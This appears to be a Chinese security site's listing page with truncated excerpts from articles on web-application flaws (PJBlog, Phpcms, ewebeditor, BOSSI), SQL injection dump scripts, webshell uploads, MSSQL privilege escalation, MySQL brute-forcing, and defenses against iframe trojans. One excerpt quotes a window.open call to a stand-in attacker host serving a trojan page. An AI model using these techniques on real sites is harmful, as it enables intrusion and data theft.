小编 PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码
发布日期:2011-06.19 发布作者:佚名 影响版本:PJBlog3 V3.2.8.352 漏洞类型:设计错误 漏洞描述:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Bl...
防止网站被JS,iframe挂马的防范方法
这种方法使用的关键代码如下: window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,...
mysql注入导库脚本代码
复制代码 代码如下: #!/usr/bin/perl -w #www.sh3llc0de.com #转载须注明 #语法 自己改改 use strict; use LWP::Simple; use utf8; $|++; my $count = 1; f...
用JavaScript防止网站被挂IFRAME木马的方法
其实如果要防止被挂IFRAME木马,方法很简单,只需要利用JavaScript对IFRAME进行控制即可。方法如下: 复制代码 代码如下: <style type=\”text/css\” media=\”al...
BOSSI 公司企业网站管理系统注入&上传漏洞利用
让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版权、公司邮局、收藏等资料可以在后台的"公司资料"里管理 —————...
ewebeditor 上传遇到防火墙限制的解决办法 图文
这是一个eweb入口(废话) 用默认帐户密码admin admin进入 样式添加asa扩展名 直接上传asp马 到这里都是顺利的,但是。。当你访问马的时候。。 试过了小马,一句话,会出现同样的问题 解决方法: 在样式添加里加上扩展名ashx 创建一个1...
MSSQL 2005 入侵提权过程分享
文章作者:udb311 前言:本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。 前期 在拿到一个webshell 后对提权进行分析如下。 1、serv-u 6.4.0.2、mssql sa密码权...
Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞
发布日期:2011-05.04发布作者:c4rp3nt3r 影响版本:phpcms2008 sp2 or sp4官方地址:http://www.phpcms.cn 漏洞类型:文件包含漏洞描述:phpcms本地包含类漏洞,如果该文件包含了/include...
设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等
设置.net1.1安全: 修改C:\\WINDOWS\\Microsoft.net\\Framework\\v1.1.4322\\CONFIG\\machine.config 文件. <identity impersonate=”fa...
网站后台脚本漏洞挖掘技巧,基于工具快速挖掘
以前写的文章,今天整理到的,这是以前搞脚本安全的一些经验,扔出来,当时靠 DW的确检测了很多脚本安全问题。BY:乱雪来源:0xx.org.cn挖掘脚本漏洞和软件漏洞相比来说更容易一些,门槛也很低,不需要掌握汇编、系统原理等等高深知识,只需要掌握脚本,甚...
记 FineUI 官方论坛discuz所遭受的一次真实网络攻击
可能是最近在参加 CSDN 举行的那个评选,FineUI 论坛吸引了一大批围观群众,也吸引了一些黑客的目光,本文会按时间顺序记录下 FineUI 论坛所遭受的这次网络攻击,期望能对其他站长有所帮助。 发现异常 2013-6-22 08:56 早上起来,...
PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到500...
